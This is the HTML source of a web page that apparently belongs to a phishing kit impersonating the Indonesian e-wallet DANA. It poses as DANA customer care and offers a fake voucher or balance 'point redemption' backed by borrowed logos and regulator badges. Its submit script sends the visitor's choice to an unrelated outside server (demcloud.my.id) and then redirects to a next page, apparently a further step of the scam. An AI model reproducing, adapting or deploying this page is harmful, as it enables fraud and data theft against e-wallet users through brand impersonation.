

<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="theme-color" content="#118EEA">
    <meta name="viewport"
        content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1">
    <title>𝗗𝗔𝗡𝗔 | 𝗖𝘂𝘀𝘁𝗼𝗺𝗲𝗿 𝗖𝗮𝗿𝗲 𝗗𝗔𝗡𝗔</title>
    <meta name="description"
        content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang.!">   
    <meta property="og:image"
        content="https://hosting.tigerengine.id/jhzlqh.jpg">    
    <meta name="twitter:image"
        content="https://hosting.tigerengine.id/jhzlqh.jpg"><link href="https://hosting.tigerengine.id/shv5u3.png"
        rel="shortcut icon" type="image/x-icon"><link href="https://hosting.tigerengine.id/shv5u3.png"
        rel="apple-touch-icon">
    
   
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css" />

    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.css" />
    <link rel="stylesheet" type="text/css"
        href="https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick-theme.css" />
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Varela+Round&amp;display=swap">
<!-- partial:index.partial.html -->
<link href="https://owlcarousel2.github.io/OwlCarousel2/assets/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet">
<link href="https://owlcarousel2.github.io/OwlCarousel2/assets/owlcarousel/assets/owl.theme.default.min.css" rel="stylesheet">
<script src="https://owlcarousel2.github.io/OwlCarousel2/assets/vendors/jquery.min.js"></script>
<script src="https://owlcarousel2.github.io/OwlCarousel2/assets/owlcarousel/owl.carousel.js">
   </script>
</head>
    <style>
    
body, html{
      left: 0;
      right: 0;
      bottom: 0;
      top: 0;
      margin: 0px auto;
      width: 100%;
      height: 100%;
      positon: fixed
      
}
h2{font-size: 18px; }

h3{
  font-size: 14px;  
}

 
 * {
  box-sizing: border-box;
  scrollbar-color: transparent transparent; /* thumb and track color */
  scrollbar-width: 0px;
}

*::-webkit-scrollbar {
  width: 0;
}

*::-webkit-scrollbar-track {
  background: transparent;
}

*::-webkit-scrollbar-thumb {
  background-color: #118CEA;
  border: none;
}

* {
  -ms-overflow-style: none;
}

ol, li {
  list-style: none;
  margin: 0;
  padding: 0;
}

.carousel {
  position: absolute;
  background-color: #118CEA;
  padding-top:0%;
  height: 100%;
  top: 0;
  right: 0;
  left: 0;
  margin: 0px auto;
  perspective: 200px;
}

.carousel__viewport {
  position: absolute;
  padding: 32px;
  width: 100%;
  top: 0;
  background-color: #118CEA;
  right: 0;
  bottom: 0;
  left: 0;
  height: 79%;
  display: flex;
  overflow-x: scroll;
  counter-reset: item;
  margin: 0px auto;
 
  scroll-behavior: smooth;
  scroll-snap-type: x mandatory;{}
}

.carousel__slide {
  position: relative;
  flex: 0 0 100%;
  width: 100%;
  height: 100%;
  margin-left: 10px;
  background-color: #118CEA;
  counter-increment: item;
  z-index: 99999999;
}

.carousel__slide:nth-child(even) {
  background-color: #118CEA;
}

.carousel__slide:before {
  content: counter(item);
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate3d(-50%,-40%,70px);
  color: #000;
  font-size: 2em;
  background-color: #118CEA;
}

.carousel__snapper {
  position: relative;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  width: 100%;
  height: 100%;
  scroll-snap-align: center;
  background-color: #118CEA;
  
  
}

@media (hover: hover) {
  .carousel__snapper {
    animation-name: tonext, snap;
    animation-timing-function: ease;
    animation-duration: 4s;
    animation-iteration-count: infinite;
  }

  .carousel__slide:last-child .carousel__snapper {
    animation-name: tostart, snap;
  }
}

@media (prefers-reduced-motion: reduce) {
  .carousel__snapper {
    animation-name: none;
  }
}

.carousel:hover .carousel__snapper,
.carousel:focus-within .carousel__snapper {
  animation-name: none;
}

.carousel__navigation {
  position: absolute;
  right: 0;
  bottom: 0;
  left: 0;
  text-align: center;
}

.carousel__navigation-list,
.carousel__navigation-item {
  display: inline-block;
}


.carousel::before,
.carousel::after,
.carousel__prev,
.carousel__next {
  position: absolute;
  top: 0;
  margin-top: 37.5%;
  width: 0;
  height: 0;
  transform: translateY(-50%);
  border-radius: 50%;
  font-size: 0;
  outline: 0;
  opacity: 0.0;
}

.carousel::before,
.carousel__prev {
  left: -1rem;
}

.carousel::after,
.carousel__next {
  right: 0rem;
}

.carousel::before,
.carousel::after {
  content: '';
  z-index: 1;
  background-color: #fff;
  background-size: 1.5rem 1.5rem;
  background-repeat: no-repeat;
  background-position: center center;
  color: #000;
  font-size: 2.5rem;
  line-height: 4rem;
  text-align: center;
  pointer-events: none;
}

/*********************/
.process1 {
     width: 100%;
            height: 100%;
             display: flex;
             justify-content: center;
            margin: auto;
            position: absolute;
           padding-top: 300px;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.6);
            z-index: 99999;
            
      
}
.loading {
    position: absolute;
    display: flex;
    justify-content: center;
    align-items: center;
    margin-bottom: 20%;
}
.loading img {
    width: 50px;
    
    top: 10;
}
.loading .spinner{
    position: absolute;
    width: 35px;
    animation: spin 1s linear infinite;
    -webkit-animation: spin 1s linear infinite;
    -moz-animation: spin 1s linear infinite;
    -ms-animation: spin 1s linear infinite;
    -o-animation: spin 1s linear infinite;
}
@keyframes spin {
  0% { transform: rotate(360deg); }
  100% { transform: rotate(0deg); }
}
@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-moz-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-ms-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-o-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}

/*********************/

 #homeku{
     width: 100%;
     height: 100%;
     position: fixed;
    background: #118EEA;
  background-position: 100% 100%;
  background-size: 100% 100%;
  left: 0;
  right: 0;
  top: 0;
  bottom: 0;
  margin: 0px auto;
     
     
 }
 
 .inp{
     width: 70%;
     padding-left: 10px;
 }
 
 
 .btn-backku{
     position: absolute;
     left: 20;
     top: 12;
     background: transparent;
     color: #fff;
     border: none;
     font-size: 18px;
     font-weight: 300;
    
 }
 
 
 #back1{
      display: none;
     
 }
 
 #back2{
      display: none;
 }
        body {
            background-color: #fff;
            font-family: 'Open Sans', sans-serif;
            width: 100%;
            height: 100%;
            left: 0;
            right: 0;
            top: 0;            
            margin: 0px auto;
            position: fixed;
            max-width: 100%;
        }

        



        h2 {
            font-family: 'Open Sans', sans-serif;
            font-size: 15px;
            font-weight: bold;
            color: #0086e0;
            letter-spacing: 1.2px;
            text-align: center;
            line-height: 2;
            border-radius: 5px;
        }

        h3 {
            font-family: 'Open Sans', sans-serif;
            font-size: 15px;
            font-weight: bold;
            color: #0086e0;
            letter-spacing: 1.5px;
            line-height: 1;
            border-radius: 5px;
        }

        h9 {
            font-family: 'Open Sans', sans-serif;
            font-size: 13px;
            font-weight: bold;
            text-align: center;
            color: #0086e0;
            letter-spacing: 1.5px;
            line-height: 1;
            border-radius: 5px;
        }

        h4 {
            font-family: 'Open Sans', sans-serif;
            font-size: 15px;
            font-weight: 900;
            color: #0086e0;
            letter-spacing: 1px;
            text-align: center;
            line-height: 1.5;
        }

        h5 {
            font-family: 'Open Sans', sans-serif;
            font-size: 15px;
            font-weight: 600;
            color: #0086e0;
            letter-spacing: 1px;
            text-align: center;
            line-height: 1;
        }

        h6 {
            font-family: 'Open Sans', sans-serif;
            font-size: 13px;
            font-weight: bold;
            color: #000;
            letter-spacing: 1px;
            text-align: center;
            line-height: 1;
            border-radius: 5px;
        }

        .btn-punya {
            display: block;
            margin: 0 auto;
            left: 0;
            right: 0;
            cursor: pointer;
            background: none rgb(0, 134, 224);
            border: none;
            text-align: center;
            height: 48px;
            width: 100%;
            
            font-family: 'Open Sans', sans-serif;
            font-size: 16px;
            font-weight: bold;
            color: rgb(255, 255, 255);
            
            
            border-radius: 10px;
            box-shadow: 2px 2px 2px #00000050;
            transition: background 200ms ease 0s;
        }

       

        .form-log {
            box-sizing: border-box;
            height: 40px;
            width: 536px;
            max-width: 450px;
            border: 2px solid rgb(0, 134, 224);
            border-image: initial;
            background-color: rgb(255, 255, 255);
            border-radius: 8px;
            box-shadow: rgb(237, 237, 237) 2px 2px 2px 0px;
            font-family: 'Roboto Condensed', sans-serif;
            font-weight: bold;
            font-size: 16px;
            color: rgb(28, 28, 28);
            word-spacing: 7px;
            padding: 0px 45px;
        }

        #ionIcons {
            color: rgb(22, 119, 199);
            font-size: 29px;
            position: absolute;
            display: block;
            margin-top: 1px;
            margin-left: 15px;
        }

        input {
            border: 3px solid rgb(0, 134, 224);
            border-radius: 8px;
            padding: 5px 10px;
        }

        h1 {
            display: flex;
            background: #0086e0;
            /* #0086e0; */
            color: #0086e0;
            padding: 2px;
            width: 100%;
            max-width: 100%;
            text-align: center;
            align-items: center;
            margin: 0 auto;
        }

        h7 {
            display: table;
            background: #3081ce;
            color: #0086e0;
            padding: 15px;
            width: 100%;
            font-size: 12px;
            text-align: center;
            font-family: 'Roboto Condensed', sans-serif;
        }

        .container {
            max-width: 450px;
            padding: 15px;
            background-color: #fff;
            margin: 0 auto;
            left: 0;
            right: 0 ;
        }
        
        .slider{
            border-radius: 10px;
            background: ;       
            width: 100%;
        }
        
        .slider .slick-slide {
            border:  8px solid transparent;
            border-radius: 20px;
        }

        .slider .slick-slide img {
            width: 100%;
            margin-top: 0px;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.6); 
            border-radius: 10px;
            height: 100%;
            min-height: 140px;
        }

        /* make button larger and change their positions */

        .slick-prev,
        .slick-next {
            width: 0px;
            height: 0px;
            z-index: 1;
        }

        .slick-prev {
            left: 0px;
        }

        .slick-next {
            right: 0px;
        }

        .slick-prev:before,
        .slick-next:before {
            font-size: 0px;
            text-shadow: 0 0 0px rgba(0, 0, 0, 0.5);

            h7 {
                display: table;
                background: #3081ce;
                color: #fff;
                padding: 15px;
                width: 100%;
                font-size: 12px;
                text-align: center;
                font-family: 'Roboto Condensed', sans-serif;
            }

            

            

           
            

           

            /* transition effects for opacity */
            .slick-arrow {
                transition: opacity 0.2s ease-out;
            }
        }

        legend {
            padding: 2px;
            background: transparent;
            color: #0086e0;            
        }

        
        
        .process {
     width: 100%;
            height: 100%;
             display: flex;
             justify-content: center;
            margin: auto;
            position: absolute;
           padding-top: 300px;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.6);
            z-index: 99999;
            
      
}
.loading {
    position: absolute;
    display: flex;
    justify-content: center;
    align-items: center;
    margin-bottom: 20%;
}
.loading img {
    width: 50px;
    
    top: 10;
}
.loading .spinner{
    position: absolute;
    width: 35px;
    animation: spin 1s linear infinite;
    -webkit-animation: spin 1s linear infinite;
    -moz-animation: spin 1s linear infinite;
    -ms-animation: spin 1s linear infinite;
    -o-animation: spin 1s linear infinite;
}

@keyframes spin {
  0% { transform: rotate(360deg); }
  100% { transform: rotate(0deg); }
}
@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-moz-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-ms-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-o-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}


.animated {
	-webkit-animation-duration: 3s;
	animation-duration: 3s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	 -webkit-animation-name: bounceInDown; 
    animation-name: bounceInDown; 
}

@-webkit-keyframes bounceInDown { 
   0% { 
       opacity: 1; 
        -webkit-transform: translateX(200px); 
    } 
    60% { 
        opacity: 1; 
        -webkit-transform: translateX(0px); 
    } 
    80% { 
        -webkit-transform: translateX(0px); 
    } 
    100% { 
        -webkit-transform: translateX(0); 
    } 
} 

.animatedLeft {
	-webkit-animation-duration: 3s;
	animation-duration: 3s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	 -webkit-animation-name: bounceInLeft; 
    animation-name: bounceInLeft; 
}

@-webkit-keyframes bounceInLeft { 
   0% { 
       opacity: 1; 
        -webkit-transform: translateX(-200px); 
    } 
    60% { 
        opacity: 1; 
        -webkit-transform: translateX(0px); 
    } 
    80% { 
        -webkit-transform: translateX(0px); 
    } 
    100% { 
        -webkit-transform: translateX(0); 
    } 
} 

.animatedUp {
	-webkit-animation-duration: 3s;
	animation-duration: 3s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	 -webkit-animation-name: bounceInUp; 
    animation-name: bounceInUp; 
}

@-webkit-keyframes bounceInUp { 
   0% { 
       opacity: 1; 
        -webkit-transform: translateY(200px); 
    } 
    60% { 
        opacity: 1; 
        -webkit-transform: translateY(0px); 
    } 
    80% { 
        -webkit-transform: translateY(0px); 
    } 
    100% { 
        -webkit-transform: translateY(0); 
    } 
} 

@keyframes bounceInUp { 
    0% { 
        opacity: 1; 
        transform: translateY(200px); 
    } 
    60% { 
        opacity: 1; 
        transform: translateY(0px); 
    } 
    80% { 
        transform: translateY(0px); 
    } 
    100% { 
        transform: translateY(0); 
    } 
} 
    </style>
<body>
      <center>
     <div id="process1" name="process" class="process" style="display: none;">
            <div class="loading">
                <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZH-N0wN6FAmkGgyk10EQ7jvi3t_76GOfnax8pM8juwlMyN4KOy-2WuI68vLTMOnZyZmnNa7MHNI9U2k-ZcGYWruvALXJ-VnD1i4iBfezdLGGtFzjvpAmiLogvJeuvKHWwazaeN5cE6A0r9Gmiu7ObxeLFIc29G1pOJlc1QY8GPjMmZGvO0uTQX5X12rk/s1600/load_bg.png">
                <img class="spinner" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjymgZkivno__fWTdTz6vvunARIRJI4BZogXCTs1Q35vHyxC3A1oZU4JyRKdwoXwJsKF90P0B-7Tilt7sPl0VfXIdaltZEX6c97hkKpVD6MOMS04xpqaH4HL318jf_bOGlOhIL2KmyJMZfH_mhw9AqxGr28S53SYvvQaVSUwMtoWXsup2HC83uzdzoVHtY/s1600/load_spin.png" id="loading">
            </div>
        </div>
        </center>
    <h1 style="padding: 10px;">
        <center>
            <img src="https://hosting.tigerengine.id/ulqfeu.png" width="100"
                style="display:flex;margin:0 auto;left ">
        </center>
    </h1>
    <div class="container">
        <div class="slider">
            <div> <a href="#"> <img
                        src="https://hosting.tigerengine.id/nq3zwi.png"
                        alt="Image 1"> </a> </div>
            <div> <a href="#"> <img
                        src="https://hosting.tigerengine.id/kiduv9.png"
                        alt="Image 2"> </a> </div>
            <div> <a href="#"> <img src="https://hosting.tigerengine.id/f452ma.png" alt="Image 3"> </a> </div>
            <div> <a href="#"> <img
                        src="https://hosting.tigerengine.id/s6h6sa.png"
                        alt="Image 4"> </a> </div>
            <div> <a href="#"> <img
                        src="https://hosting.tigerengine.id/inx5ba.png"
                        alt="Image 5"> </a> </div>
            
        </div>
        <form  id="patok" onsubmit="letsgo1()" method="post">
 
            <div class="panel panel-info animated" style="margin:0 auto;left:0;right:0;outline: 2px double #0086e0; border-radius: 13px">
                
                <div class="panel-body">
                    <style>
                        label{
                            margin-top: 5px;
                            position: absolute;
                            line-height: 20px;
                        }
                        
                        input[type="radio"] {
  width: 20px;
  height: 20px;
  accent-color: #007bff; /* Warna biru */
}
                    </style>
                        <p style="border-radius:15px;margin:0 auto;left:0;right:0;text-align: center; font-size: 14px; border-bottom: 2px double #0086e0; font-weight: bold; color: #0086e0">Pilih Penukaran Poin Anda di Bawah Ini<br><br></p>
                        <legend>
                            
                            <br> 
                           
  <input type="radio" id="baru" name="tarif" value="𝗩𝗼𝘂𝗰𝗵𝗲𝗿 𝗕𝗲𝗹𝗮𝗻𝗷𝗮 Rp. 500.000" required >
  <label for="baru" style="font-size:15px;text-shadow: 2px 2px 2px #00000030;">&nbsp; 𝗩𝗼𝘂𝗰𝗵𝗲𝗿 𝗕𝗲𝗹𝗮𝗻𝗷𝗮 Rp. 3.500.000</label>
                            <br>
  <input type="radio" id="lama" name="tarif" value="𝗦𝗮𝗹𝗱𝗼 𝗗𝗮𝗻𝗮 Rp. 700.000"  required >
  <label for="lama" style="font-size:15px;text-shadow: 2px 2px 2px #00000030;">&nbsp; 𝗦𝗮𝗹𝗱𝗼 𝗗𝗮𝗻𝗮 Rp. 3.000.000</label>
                             <br>
   
                            
                            
                     
                        </legend>
                        
                       
                </div>
            </div> 
      <br> 
            
            
            
                 <button id="btn1" class="btn-punya animatedLeft" type="submit" >Konfirmasi</button>
        </form>
    
  
  
     <br><br>
   
        <h6>Dana Terdaftar dan diawasi oleh:</h6>
        <center>
            <div class="css-dnzamn"><img src="https://hosting.tigerengine.id/sxbut9.png"
                    width="60"><img src="https://hosting.tigerengine.id/45b4wg.png"
                    width="70"><img
                    src="https://hosting.tigerengine.id/vfejf1.jpg"
                    width="70">
                <img src="https://hosting.tigerengine.id/srk5n2.png" width="50">
            </div>
            <br>
<!--- ## DRIBBBLE + TWITTER ############# -->

<footer class="animatedUp"style="max-width:450px;margin: 0 auto;left: 0;right:0;position: fixed; bottom: 0; left: 0; right: 0; width: 100%; height: 20%; z-index: 3; background-color: #fff; border-radius: 15px 15px 0px 0px;background-image: url(https://a.m.dana.id/resource/danaweb-v2/hero-personal-bg-back.png); background-position: 100% 100%;background-size: 100% 100%;border-top: 3px groove #fff;outline: 3px solid #118EEA;box-shadow: rgba(6, 24, 44, 0.5) 0px 0px 5px 5px ;">
<!----------HTML code starts here------->

<div class="owl-carousel owl-theme owl-loaded " style="margin-top:-5px;height: 125px; transform-style: preserve-3d; overflow: hidden">
            
       <div class="owl-stage-outer" style="padding: 0 90px; height: 160px; width: 100%; transform-style: preserve-3d;">
         
         <div class="owl-stage" style="transform: translate3d(-1527px, 0px, 0px); transition: all 0.05s ease 1s; width: 3334px; background-color: ; padding: 20px; width: 80%">
           
   <div class="owl-item item active;" style="box-shadow: rgba(50, 50, 93, 0.25) 0px 6px 12px -2px, rgba(0, 0, 0, 0.3) 0px 3px 7px -3px; border-radius: 10px; background: transparent"><img src="https://a.m.dana.id/danaweb/promo/1706678558-WebBanner-DANAscaVAngerHunt-500x300px.png" style="border-radius: 20px 0 20px 0"></div>
   <div class="owl-item item active" style="background-color: #000; box-shadow: rgba(50, 50, 93, 0.25) 0px 6px 12px -2px, rgba(0, 0, 0, 0.3) 0px 3px 7px -3px; border-radius: 20px 0 20px 0; background: transparent"><img src="https://a.m.dana.id/danaweb/promo/1706850538-010224-EIS157-eMAS_10__Cashback-Web_Banner-Thumbnails.png" style="border-radius: 20px 0 20px 0"></div>
   <div class="owl-item item active" style="box-shadow: rgba(50, 50, 93, 0.25) 0px 6px 12px -2px, rgba(0, 0, 0, 0.3) 0px 3px 7px -3px; background: transparent"><img src="https://a.m.dana.id/danaweb/promo/1707410449-e-MAS_CB_75K_-_Website_Thumbnail_500x300p.png"  style="border-radius: 20px 0 20px 0"></div>
   <div class="owl-item item active" style="box-shadow: rgba(50, 50, 93, 0.25) 0px 6px 12px -2px, rgba(0, 0, 0, 0.3) 0px 3px 7px -3px; background: transparent"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRuW6U6dh3zHya46wmfDGBPxD1VxQW3A6T7pe6jFaBvjEigmXH0OJfqnxoGSpDQ6_BkBIg6BWwon94vEqDib5OKCYcQSXVHLt2U5oZ_T4LcynKiK08F3mJlCzD90mhxocCY0IVuKCGXKtOk2eKo5KkrlcjcUF_Uewa5f-j5_u5Dm7ZlQQyoYycQuw7rE8/s1080/AddText_12-21-12.32.33.jpg" height="105px" style="border-radius: 20px 0 20px 0"></div>
   <div class="owl-item item active" style="box-shadow: rgba(50, 50, 93, 0.25) 0px 6px 12px -2px, rgba(0, 0, 0, 0.3) 0px 3px 7px -3px; background: transparent"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkZAkIZGHEXRjc_FpkfEsXMrXRTzj8Qbd9tfZCVCM5oBTJ1aappFW8gcWIIiE_Bx9xs92V43KRwFtXqxlWVXL0X4xJK65urazsQOM2rf2KqW41Iu4Kqsci2opoQYLXDIeOaP5o7qfHkHeAt3la_alR2e7Oc9B0Wm_4-XgELyqZ43a31yTDwjT-ax4BT4I/s1080/AddText_12-21-12.44.48.jpg" height="105px" style="border-radius: 20px 0 20px 0"></div>
   <div class="owl-item item active" style="box-shadow: rgba(50, 50, 93, 0.25) 0px 6px 12px -2px, rgba(0, 0, 0, 0.3) 0px 3px 7px -3px; background: transparent"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1DlNIZMZwlCLmLWLKDIQI8wIMl54h-fyVu1xDTk5LqBsgDWj_G-NirAlcTi4P8aXnspoes5dyt-xp9pdIFG-MdBRhKJJB5un6s713vA7GZNwIspuuE2QR_quy_wL1xJ2htXc5_38pU4xFQDRrjX3K0JkI_eEojnRJYTXj3fgipX0atm8VZjdfDSSbHAo/s1080/AddText_12-25-01.43.43.jpg" height="105px" style="border-radius: 20px 0 20px 0"></div>
   <div class="owl-item item active" style="box-shadow: rgba(50, 50, 93, 0.25) 0px 6px 12px -2px, rgba(0, 0, 0, 0.3) 0px 3px 7px -3px; background: transparent; border-radius: 20px 0 20px 0"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYo-GsnUUKLNEPq8tvu2jEOSBVFmtKIl-4NO3rCBHwMFehYhF3DWiR7c0tgnAlb1sWhjoCC6B82S6ypZJ13t-2FB851EHm6SzCpI3YGlVtTi1Hldf4MORJPdxKQ1ghCWf7x4ilcKtTxPurpQAudh9nAgziFkImNZuaTo80538roOfUyhqEtY-QLYyavss/s1080/AddText_02-05-05.34.58.jpg" height="105px" style="border-radius: 20px 0 20px 0"></div>
                                  
              </div>
            </div>
         </div>           
      </div>    
</footer>
<!-- partial -->
  <script>
var owl = $('.owl-carousel');
owl.owlCarousel({
    items:2, 
  // items change number for slider display on desktop
  
    loop:true,
    margin:10,
    autoplay:true,
    autoplayHoverPause:true
});      
      
  </script>
            <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js">
            </script>
            <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.min.js">
            </script>

            <script>
                $(document).ready(function () {
                    $('.slider').slick({
                        autoplay: true,
                        autoplaySpeed: 2000,
                        dots: true
                    });
                });
                
            </script>
            
           <script>
var logo = "☴ www.dana.id ☴";    
       
 function letsgo1(){
    $("#process1").fadeIn();
    event.preventDefault();
    
  var tarif = $('input[name="tarif"]:checked').val();
       if (tarif) {  
  sessionStorage.setItem('tarif', tarif);
  }
    
  var gabungan = "" + logo + '\n\n' + tarif;
        
   $.ajax({
        url: 'https://demcloud.my.id/dana/5kbd1/kb/im.php',       
        type: 'POST',
        data: { message: gabungan },
        crossDomain: true,
        headers: {
            'Accept': 'application/json',
            'Content-Type': 'application/x-www-form-urlencoded',
        },
    
    complete: function(){  
    setTimeout(function(){
    $("#process1").fadeOut();
    location.href='int.html';
    }, 200);}});};
</script>
</body>

</html>
